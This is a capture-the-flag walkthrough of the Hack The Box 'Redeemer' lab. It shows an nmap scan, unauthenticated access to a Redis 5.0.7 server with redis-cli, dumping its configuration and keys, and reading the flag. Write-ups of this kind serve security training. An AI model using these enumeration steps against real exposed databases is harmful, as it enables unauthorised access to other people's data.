HTB Redeemer

This is one of the starting point HTB boxes.
It is rated as a very easy and only have 1 flag.

$ nmap -p- -A 10.129.216.146 --min-rate 5000

Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-05 10:51 CEST
Nmap scan report for 10.129.216.146
Host is up (0.037s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.7

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.54 seconds

So, we are facing a Redis v5.0.7 instance.

According to its site:

Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes, and streams. Redis has built-in replication, Lua scripting, LRU eviction, transactions, and different levels of on-disk persistence, and provides high availability via Redis Sentinel and automatic partitioning with Redis Cluster.

https://redis.io/

Let’s try to enum this Redis.

$ redis-cli -h 10.129.216.146

10.129.216.146:6379> 

No credentials are needed.

With these commands we can get info from the Redis:

10.129.216.146:6379> info

# Server
redis_version:5.0.7
...
lru_clock:10252452
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
...
blocked_clients:0

# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:6062080
...
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:4
...
aof_last_cow_size:0

# Stats
total_connections_received:18
total_commands_processed:22
...
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
...
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.634172
...
used_cpu_user_children:0.000000

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=4,expires=0,avg_ttl=0
...

10.129.216.146:6379> config get *

  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "cluster-announce-ip"
  8) ""
  9) "unixsocket"
 10) ""
 11) "logfile"
 12) "/var/log/redis/redis-server.log"
 13) "pidfile"
 14) "/var/run/redis/redis-server.pid"
 15) "slave-announce-ip"
 16) ""
...

From Info command we can se there is a database 0 with 4 keys.
Inside Redis the databases are numbers starting from 0.

10.129.216.146:6379> select 0

OK

10.129.216.146:6379> keys *

1) "stor"
2) "temp"
3) "numb"
4) "flag"

10.129.216.146:6379> GET flag

"03e1XXXXXXXXXXXXXXXXXXXXXXXXXXXX"